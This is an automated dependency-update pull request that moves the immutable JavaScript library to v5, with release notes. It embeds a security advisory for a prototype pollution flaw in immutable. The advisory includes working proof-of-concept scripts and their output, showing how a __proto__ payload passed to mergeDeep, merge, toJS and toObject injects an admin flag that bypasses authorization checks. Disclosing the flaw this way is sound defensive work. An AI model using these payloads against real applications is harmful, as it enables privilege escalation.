fix(deps): update dependency immutable to v5 [security]

[renovate-sh-app]

This PR contains the following updates:

Package	Change	Age	Confidence
immutable (source)	^4.3.7 → ^5.0.0

GitHub Vulnerability Alerts

CVE-2026-29063

Impact

What kind of vulnerability is it? Who is impacted?

A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.

Affected APIs

API	Notes
mergeDeep(target, source)	Iterates source keys via ObjectSeq, assigns merged[key]
mergeDeepWith(merger, target, source)	Same code path
merge(target, source)	Shallow variant, same assignment logic
Map.toJS()	object[k] = v in toObject() with no __proto__ guard
Map.toObject()	Same toObject() implementation
Map.mergeDeep(source)	When source is converted to plain object

Patches

Has the problem been patched? What versions should users upgrade to?

major version	patched version
3.x	3.8.3
4.x	4.3.7
5.x	5.1.5

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

• Validate user input
• Node.js flag --disable-proto
• Lock down built-in objects
• Avoid lookups on the prototype
• Create JavaScript objects with null prototype

Proof of Concept

PoC 1 — mergeDeep privilege escalation

"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4

// Simulates: app merges HTTP request body (JSON) into user profile
const userProfile = { id: 1, name: "Alice", role: "user" };
const requestBody = JSON.parse(
  '{"name":"Eve","__proto__":{"role":"admin","admin":true}}',
);

const merged = mergeDeep(userProfile, requestBody);

console.log("merged.name:", merged.name); // Eve   (updated correctly)
console.log("merged.role:", merged.role); // user  (own property wins)
console.log("merged.admin:", merged.admin); // true  ← INJECTED via __proto__!

// Common security checks — both bypassed:
const isAdminByFlag = (u) => u.admin === true;
const isAdminByRole = (u) => u.role === "admin";
console.log("isAdminByFlag:", isAdminByFlag(merged)); // true  ← BYPASSED!
console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)

// Stealthy: Object.keys() hides 'admin'
console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']
// But property lookup reveals it:
console.log("merged.admin:", merged.admin); // true

PoC 2 — All affected APIs

"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");

const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}');

// 1. mergeDeep
const r1 = mergeDeep({ user: "alice" }, payload);
console.log("mergeDeep admin:", r1.admin); // true

// 2. mergeDeepWith
const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);
console.log("mergeDeepWith admin:", r2.admin); // true

// 3. merge
const r3 = merge({ user: "alice" }, payload);
console.log("merge admin:", r3.admin); // true

// 4. Map.toJS() with __proto__ key
const m = Map({ user: "alice" }).set("__proto__", { admin: true });
const r4 = m.toJS();
console.log("toJS admin:", r4.admin); // true

// 5. Map.toObject() with __proto__ key
const m2 = Map({ user: "alice" }).set("__proto__", { admin: true });
const r5 = m2.toObject();
console.log("toObject admin:", r5.admin); // true

// 6. Nested path
const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}');
const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);
console.log("nested admin:", r6.profile.admin); // true

// 7. Confirm NOT global
console.log("({}).admin:", {}.admin); // undefined (global safe)

Verified output against immutable@5.1.4:

mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined  ← global Object.prototype NOT polluted

References

Are there any links users can visit to find out more?

• JavaScript prototype pollution

Severity

• CVSS Score: 8.7 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

---

Release Notes

immutable-js/immutable-js (immutable)

v5.1.5

Compare Source

• Fix Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in immutable

v5.1.4

Compare Source

• Migrate some files to TS by @​jdeniau in #​2125
  • Iterator.ts
  • PairSorting.ts
  • toJS.ts
  • Math.ts
  • Hash.ts
• Extract CollectionHelperMethods and convert to TS by @​jdeniau in #​2131
• Use npm trusted publishing only to avoid token stealing.

Documentation

• Fix/a11y issues by @​lyannel in #​2136
• Doc add Map.get signature update by @​borracciaBlu in #​2138
• fix(doc):minor-issues#2132 by @​JayMeDotDot in #​2133
• Fix algolia search by @​jdeniau in #​2135
• Typo in OrderedMap by @​jdeniau in #​2144

Internal

• chore: Sort all imports and activate eslint import rule by @​jdeniau in #​2119

v5.1.3

Compare Source

TypeScript

• fix: allow readonly map entry constructor by @​septs in #​2123

Documentation

There has been a huge amount of changes in the documentation, mainly migrate from an autogenerated documentation from .d.ts file, to a proper documentation in markdown.
The playground has been included on nearly all method examples.
We added a page about browser extensions too: https://immutable-js.com/browser-extension/

Internal

• replace rimraf by a node script by @​jdeniau in #​2113
• remove warning for tseslint config by @​jdeniau in #​2114
• Use default tsconfig for tests by @​jdeniau in #​2055
• add tests for arrCopy by @​jdeniau in #​2120

v5.1.2

Compare Source

• Revert previous assertion as it introduced a regression #​2102 by @​giggo1604
• Merge should work with empty record #​2103 by @​jdeniau

v5.1.1

Compare Source

• Fix type copying

v5.1.0

Compare Source

• Add shuffle to list #​2066 by @​mazerty
• TypeScript: Better getIn RetrievePath #​2070 by @​jdeniau
• Fix #​1915 "Converting a Seq to a list causes RangeError (max call size exceeded)" by @​alexvictoor in #​2038
• TypeScript: Fix proper typings for Seq.concat() #​2040 by @​alexvictoor
• Fix Uncaught "TypeError: keyPath.slice is not a function" for ArrayLike method #​2065 by @​jdeniau

Internal

• Upgrade typescript and typescript-eslint #​2046 by @​jdeniau
• Upgrade to rollup 4 #​2049 by @​jdeniau
• Start migrating codebase to TypeScript without any runtime change nor .d.ts change:
  • allow TS files to be compiled in src dir #​2054 by @​jdeniau
• add exception for code that should not happen in updateIn #​2074 by @​jdeniau
• Reformat Range.toString for readability #​2075 by @​Ustin.Vaskin

v5.0.3

Compare Source

• Fix List.VNode.removeAfter() / removeBefore() issue on some particular case #​2030 by @​alexvictoor

v5.0.2

Compare Source

• Fix wrong path for esm module after fix in 5.0.1

v5.0.1

Compare Source

• Fix circular dependency issue with ESM build by @​iambumblehead in #​2035 by @​iambumblehead

v5.0.0

Compare Source

Breaking changes

To sum up, the big change in 5.0 is a Typescript change related to Map that is typed closer to the JS object. This is a huge change for TS users, but do not impact the runtime behavior. (see Improve TypeScript definition for Map for more details)

Other breaking changes are:

[BREAKING] Remove deprecated methods:

Released in 5.0.0-rc.1

• Map.of('k', 'v'): use Map([ [ 'k', 'v' ] ]) or Map({ k: 'v' })
• Collection.isIterable: use isIterable directly
• Collection.isKeyed: use isKeyed directly
• Collection.isIndexed: use isIndexed directly
• Collection.isAssociative: use isAssociative directly
• Collection.isOrdered: use isOrdered directly

[BREAKING] OrdererMap and OrderedSet hashCode implementation has been fixed

Released in 5.0.0-rc.1

Fix issue implementation of hashCode for OrdererMap and OrderedSet where equal objects might not return the same hashCode.

Changed in #​2005

[BREAKING] Range function needs at least two defined parameters

Released in 5.0.0-beta.5

Range with undefined would end in an infinite loop. Now, you need to define at least the start and end values.

If you need an infinite range, you can use Range(0, Infinity).

Changed in #​1967 by @​jdeniau

[Minor BC break] Remove default export

Released in 5.0.0-beta.1

Immutable does not export a default object containing all it's API anymore.
As a drawback, you can not immport Immutable directly:

- import Immutable from 'immutable';
+ import { List, Map } from 'immutable';

- const l = Immutable.List([Immutable.Map({ a: 'A' })]);
+ const l = List([Map({ a: 'A' })]);

If you want the non-recommanded, but shorter migration path, you can do this:

- import Immutable from 'immutable';
+ import * as Immutable from 'immutable';

  const l = Immutable.List([Immutable.Map({ a: 'A' })]);

[TypeScript Break] Improve TypeScript definition for Map

Released in 5.0.0-beta.1

If you do use TypeScript, then this change does not impact you : no runtime change here.
But if you use Map with TypeScript, this is a HUGE change !
Imagine the following code

const m = Map({ length: 3, 1: 'one' });

This was previously typed as Map<string, string | number>

and return type of m.get('length') or m.get('inexistant') was typed as string | number | undefined.

This made Map really unusable with TypeScript.

Now the Map is typed like this:

MapOf<{
  length: number;
  1: string;
}>;

and the return type of m.get('length') is typed as number.

The return of m.get('inexistant') throw the TypeScript error:

Argument of type '"inexistant"' is not assignable to parameter of type '1 | "length"

If you want to keep the old definition

This is a minor BC for TS users, so if you want to keep the old definition, you can declare you Map like this:

const m = Map<string, string | number>({ length: 3, 1: 'one' });

If you need to type the Map with a larger definition

You might want to declare a wider definition, you can type your Map like this:

type MyMapType = {
  length: number;
  1: string | null;
  optionalProperty?: string;
};
const m = Map<MyMapType>({ length: 3, 1: 'one' });

Keep in mind that the MapOf will try to be consistant with the simple TypeScript object, so you can not do this:

Map({ a: 'a' }).set('b', 'b');
Map({ a: 'a' }).delete('a');

Like a simple object, it will only work if the type is forced:

Map<{ a: string; b?: string }>({ a: 'a' }).set('b', 'b'); // b is forced in type and optional
Map<{ a?: string }>({ a: 'a' }).delete('a'); // you can only delete an optional key

Are all Map methods implemented ?

For now, only get, getIn, set, update, delete, remove, toJS, toJSON methods are implemented. All other methods will fallback to the basic Map definition. Other method definition will be added later, but as some might be really complex, we prefer the progressive enhancement on the most used functions.

Fixes

• Fix type inference for first() and last() #​2001 by @​butchler
• Fix issue with empty list that is a singleton #​2004 by @​jdeniau
• Map and Set sort and sortBy return type #​2013 by @​jdeniau

Internal

• [Internal] Migrating TS type tests from dtslint to TSTyche #​1988 and #​1991 by @​mrazauskas.
  Special thanks to @​arnfaldur that migrated every type tests to tsd just before that.
• [internal] Upgrade to rollup 3.x #​1965 by @​jdeniau
• [internal] upgrade tooling (TS, eslint) and documentation packages: #​1971, #​1972, #​1973, #​1974, #​1975, #​1976, #​1977, #​1978, #​1979, #​1980, #​1981

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

Need help?

You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section.